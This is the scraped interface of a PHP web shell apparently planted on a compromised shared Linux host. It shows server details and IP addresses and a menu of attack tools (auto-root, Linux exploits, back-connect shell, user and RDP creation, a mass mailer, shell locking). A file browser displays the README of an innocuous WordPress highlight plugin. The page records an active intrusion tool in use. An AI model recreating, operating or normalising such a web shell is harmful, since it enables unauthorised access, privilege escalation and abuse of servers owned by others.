Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
highlight /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
1.15
KB
-rw-r--r--
highlight.php.gz
1.77
KB
-rw-r--r--
highlight.pl
2.74
KB
-rw-r--r--
highlight_pipe.php.gz
1.38
KB
-rw-r--r--
highlight_pipe.pm
1.51
KB
-rw-r--r--
highlight_pipe.py
1.26
KB
-rw-r--r--
syntax.php.gz
2.7
KB
-rw-r--r--
testmod.py
3.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
=== Highlight plugin === This plugin uses highlight (http://www.andre-simon.de) to add syntax highlighting to WordPress. == Description == The highlight utility converts source code of 190 programming languages to HTML with syntax highlighting. This plugin pipes the content of <pre>-Tags associated with a lang parameter to highlight, and returns the output code which is included in the WordPress blog entry. Usage: Paste the following in the code section of the blog editing form (HTML mode !): <pre lang="c">#include <stdio.h> int main (void){ printf("This is some random code"); return 0; }</pre> Use the lang parameter to define the programming language (c, php, py, xml, etc). See the highlight documentation to learn all possible languages. See the highlight.php file for some formatting options (line numbering, code indentation, line wrapping etc). == Installation == 1. Install highlight (www.andre-simon.de) on your host 2. Unzip the wp_highlight.zip file and upload the content to the `/wp-content/plugins/` directory OR Copy the highlight.php file to the `/wp-content/plugins/` directory 3. Activate the plugin in the WordPress backend
Close